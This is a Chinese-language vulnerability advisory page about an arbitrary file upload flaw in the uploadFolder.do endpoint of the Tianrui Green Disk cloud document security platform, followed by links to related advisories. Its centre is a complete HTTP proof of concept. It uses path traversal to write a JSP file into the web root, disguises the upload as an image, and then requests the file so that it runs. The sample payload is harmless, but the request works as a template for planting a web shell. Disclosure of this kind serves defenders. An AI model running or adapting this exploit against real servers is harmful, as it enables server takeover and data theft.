天锐绿盘云文档安全管理 uploadFolder 存在文件上传漏洞

日期: 2025-08-11 18:25:21 | 影响软件: 天锐绿盘 | POC: 已公开

漏洞描述

文件上传漏洞发生在应用程序允许用户上传文件的功能中，如果上传功能未能正确地验证和限制上传文件的类型和内容，攻击者可能利用此漏洞上传恶意文件，如包含可执行代码的脚本文件，从而在服务器上执行任意命令，控制或破坏系统。

PoC代码

POST /lddsm/service/../admin/activiti/uploadFolder.do?taskId=../webapps/ROOT/&relativepath=1&path=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: [calculated_length]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXqK9dR2yTv7wNpLm

------WebKitFormBoundaryXqK9dR2yTv7wNpLm
Content-Disposition: form-data; name="file"; filename="hello.jsp"
Content-Type: image/png

<% out.println("HelloWorld");%>
------WebKitFormBoundaryXqK9dR2yTv7wNpLm--

GET /hello.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Connection: close

漏洞描述

PoC代码

相关漏洞推荐

天锐绿盘 starPermissionFlow.do 反序列化 无POC

天锐绿盘云文档安全管理平台getDsmClientLog存在SQL注入漏洞 无POC

天锐绿盘云文档安全管理平台存在FastJson反序列化漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

天锐绿盘 starPermissionFlow.do 反序列化无POC

天锐绿盘云文档安全管理平台getDsmClientLog存在SQL注入漏洞无POC

天锐绿盘云文档安全管理平台存在FastJson反序列化漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC